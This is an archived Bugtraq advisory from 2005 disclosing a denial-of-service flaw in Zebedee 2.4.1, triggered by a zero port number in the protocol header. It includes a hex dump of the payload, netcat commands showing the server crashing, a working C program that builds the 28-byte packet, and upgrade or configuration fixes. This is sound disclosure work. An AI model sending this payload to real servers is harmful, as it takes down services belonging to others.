Zebedee DoS Vulnerability

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Zebedee DoS Vulnerability
From: "Shiraishi.M" <shiraishi@xxxxxxxxxx>
Date: Fri, 9 Sep 2005 14:21:36 +0900
Cc: <shiraishi@xxxxxxxxxx>
Importance: Normal
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

We have found a denial of service vulnerability in Zebedee.
This issue have been fixed in 2.4.1A.

[TESTED ON]

Zebedee 2.4.1 (Windows version and source compiled Linux version)

[VULNERABILITY]

The server crushes when "0" received as the port number in the
protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff  >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00              >..0.!..t....<
00001c

The 9th and 10th byte of the header contains 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
 sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
 sent 0, rcvd 0

$

In the zebedee.c, please look at the function makeConnection() wich called 
from server(),

   1703     /* Sanity check */
   1704
   1705     assert(host != NULL && port != 0);
   1706

Here, if the port number is "0", both sub and parent processes seemed to 
quit running.

This issue occurs when the "allowed redirection port" not set(in default).

[SOLUTION]

1) Upgrading zebedee to 2.4.1A.
Or
2) Setting up allowed redirection ports will address this issue.

[SAMPLE EXPLOIT]

mkZebedeeDoS.c

/*
        $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
        $ ./mkZebedeeDoS > zebedeeDoS
        $ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{

        int i, size;

        char data[] = {
        0x02, 0x01, // protocol version
        0x00, 0x00, // flags
        0x20, 0x00, // max message size
        0x00, 0x06, // compression info
        0x00, 0x00, // port request: value = 0x0
        0x00, 0x80, // key length
        0xff, 0xff, 0xff, 0xff, // key token
        0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
        0x00, 0x00, 0x00, 0x00 // target host address
         };

        size = 28;
        for(i=0; i<size; i++){
                printf("%c", data[i]);
        }

        return 0;

}


[DISCOVERED BY]

International Network Security, Inc.
        Mitsuaki Shiraishi
        Tomoki Sanaki
        Mutallip Ablimit


-----------------
International Network Security, Inc.
Shiraishi.M
<shiraishi@xxxxxxxxxx>

Prev by Date: KillProcess 2.20 and priors "FileDescription" Local Buffer Overflow Issue
Next by Date: KillProcess 2.20 and priors "FileDescription" Local Buffer Overflow Issue
Previous by thread: KillProcess 2.20 and priors "FileDescription" Local Buffer Overflow Issue
Next by thread: class-1 Forum Software v 0.24.4 Remote code execution
Index(es):
- Date
- Thread